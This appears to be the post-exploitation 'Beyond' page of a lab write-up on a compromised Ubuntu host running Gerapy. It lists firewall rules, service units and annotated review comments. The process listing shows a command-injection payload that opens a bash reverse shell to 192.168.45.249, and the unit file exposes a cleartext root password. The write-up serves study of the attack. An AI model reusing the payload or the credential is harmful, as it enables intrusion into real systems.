Beyond
This is the Beyond page, where additional post-compromise enumeration and assessment are conducted as the root
user after compromising the target system.
Firewall
root@ubuntu:~# iptables -L
Chain INPUT (policy ACCEPT)
target prot opt source destination
Chain FORWARD (policy ACCEPT)
target prot opt source destination
Chain OUTPUT (policy ACCEPT)
target prot opt source destination
app.service
root@ubuntu:~# systemctl status app.service
● app.service - Gerapy app service
Loaded: loaded (/etc/systemd/system/app.service; enabled; vendor preset: enabled)
Active: active (running) since Sat 2024-08-03 04:47:19 UTC; 8 months 1 day ago
Main PID: 844 (bash)
Tasks: 12 (limit: 2234)
Memory: 544.5M
CPU: 3min 864ms
CGroup: /system.slice/app.service
├─ 844 /bin/bash /home/app/run.sh
├─ 1039 /usr/bin/python3 /usr/local/bin/gerapy runserver 0.0.0.0:8000
├─ 1734 /bin/sh -c "gerapy parse --start False --method GET --url None --callback None --cookies '{}' --headers '{}' --meta '{}' --dont_filter False --priority 0 projects/3 \`/bin/bash -c 'bash -i >& /dev/tcp/192.168.45.249/8000 0>&1'\`"
├─ 1735 /bin/bash -c "bash -i >& /dev/tcp/192.168.45.249/8000 0>&1"
├─ 1736 bash -i
└─10971 gpg-agent --homedir /home/app/.gnupg --use-standard-socket --daemon
root@ubuntu:~# cat /etc/systemd/system/app.service
[Unit]
Description=Gerapy app service
# NOTE(review): annotation added in review, not present in the file on the host.
# The comment line below appears to hold a cleartext credential in user:password
# form for the root account. Unit files are commonly readable by every local
# user (confirm this file's mode), so a secret left in a comment here may be
# exposed to any account on the box, including the service account. Remove it
# from the unit and rotate the password.
# root:4!m?C%7k@Xb?XNH0!>6K
[Service]
# NOTE(review): the service runs under the "app" account rather than root, so
# code executed through the application starts with that account's privileges.
User=app
Type=simple
# NOTE(review): the unit starts a wrapper script with bash; the script path is
# under /home/app, so confirm whether the service account can modify it.
ExecStart=/bin/bash /home/app/run.sh
[Install]
WantedBy=multi-user.target
root@ubuntu:~# cat /home/app/run.sh
#!/bin/bash
# NOTE(review): the comments in this listing were added in review; they are not
# part of the file on the host.
# Startup wrapper run by app.service (ExecStart=/bin/bash /home/app/run.sh).
# NOTE(review): neither cd below is checked; if one fails, the following gerapy
# commands still run, from whatever directory the shell is in.
cd /home/app
# Presumably creates the "gerapy" workspace directory that the next cd enters.
gerapy init
cd gerapy
gerapy migrate
# NOTE(review): seeds an admin account for the web UI; confirm it is not left
# with a default password.
gerapy initadmin
# NOTE(review): listens on 0.0.0.0, i.e. every interface, on port 8000. The
# iptables listing on this page shows ACCEPT policies with no rules, so nothing
# on the host filters access to this port. Bind to a specific address or
# restrict the port if the UI is not meant to be reachable from the network.
gerapy runserver 0.0.0.0:8000
containerd.service
root@ubuntu:~# systemctl status containerd.service
● containerd.service - containerd container runtime
Loaded: loaded (/lib/systemd/system/containerd.service; enabled; vendor preset: enabled)
Active: active (running) since Sat 2024-08-03 04:47:20 UTC; 8 months 1 day ago
Docs: https://containerd.io
Main PID: 867 (containerd)
Tasks: 8
Memory: 51.0M
CPU: 1.475s
CGroup: /system.slice/containerd.service
└─867 /usr/bin/containerd
root@ubuntu:~# cat /lib/systemd/system/containerd.service
# Copyright The containerd Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
[Unit]
Description=containerd container runtime
Documentation=https://containerd.io
After=network.target local-fs.target
[Service]
ExecStartPre=-/sbin/modprobe overlay
ExecStart=/usr/bin/containerd
Type=notify
Delegate=yes
KillMode=process
Restart=always
RestartSec=5
# Having non-zero Limit*s causes performance problems due to accounting overhead
# in the kernel. We recommend using cgroups to do container-local accounting.
LimitNPROC=infinity
LimitCORE=infinity
LimitNOFILE=infinity
# Comment TasksMax if your systemd version does not supports it.
# Only systemd 226 and above support this version.
TasksMax=infinity
OOMScoreAdjust=-999
[Install]
WantedBy=multi-user.target